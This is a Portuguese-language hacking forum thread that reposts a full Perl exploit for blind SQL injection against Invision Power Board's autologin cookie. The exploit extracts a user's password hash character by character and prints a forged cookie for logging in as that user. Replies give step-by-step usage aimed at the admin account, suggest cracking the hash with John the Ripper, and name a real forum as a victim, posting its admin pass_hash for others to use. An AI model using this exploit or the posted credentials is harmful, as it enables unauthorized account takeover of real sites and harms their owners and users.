FORUM DARKERS

Bom estava eu tentando aprender ingles pra aprender mais e talz...ae eu fui no hackyou dei uma rodada lá e achei esse exploit :


##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com (http://remusomega.com)
##################################################################

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2])
{
        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org) [id] [ver 1/2].\n\n";
        exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
                my $res = $ua->get($path, @cookie);

                # If we get a valid sql request then this
                # does not appear anywhere in the sources
                $pattern = '';

                $_ = $res->content;

                if ($dbug) { print };

                if ( !(/$pattern/) )
                {
                        $outputs .= $current;
                        print "$current\n";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# ReMuSoMeGa & nova

pra quem quiser usar é simples, só por ele na pasta do seu perl, ir no dos ir pra pasta onde ta o exploit (que é dentro da pasta perl) e fazer o seguinte, perl nomedoexploit.pl www.site.com.br/forum/ (http://www.site.com.br/forum/) 1 ( que geralmente é o ID do admin ) e 2 ( que é a versão do forum, se for 1.*.*, tem que colocar 1, se for 2.*.* tem que por 2) ae as vezes se pega o hash pass do id que vc procurou (em md5), agora eu só tenho uma duvida, tem que desencryptografar o md5 que agente pega ou editar os cookies ?

Amigo, creio que vc tenha que quebrar o MD5. Para isso use o Jonh The Ripper ou o l0phtcrack. ;D

Amilly.. :-*

Bah, aqui deu erro.

Olha só o erro:

Cant's locate LWP/UserAgente.pm in @INC
Alguém pode me ajudar?!? To precisando.

...by Cloudy

Quebrar MD5?!!??!?!?!?!!?


COm BFFFFFFFF?


nossa kra md5 eh gigante nao sei se da pra quebrar com BF nao...

hmm não precisa quebrar a senha...basta editar os cookies...testei nesse site http://www.wingofmadness.com/forums/ind ... owforum=21 (http://www.wingofmadness.com/forums/index.php?showforum=21)
não compensa explorar essa falha porque só logamos como admin e nao temos acesso a muitas coisas, pra quem quiser mais vai ter que perde um bom tempo tentando quebrar a md5...

Have Fun

edit: pra quem quiser testar... http://wingofmadness.com/forums/&nbsp; (http://wingofmadness.com/forums/&nbsp;) passhash 307af6946c93d5a30e556937c49318cf membe_id 1 ,deletem o resto dexa só os 2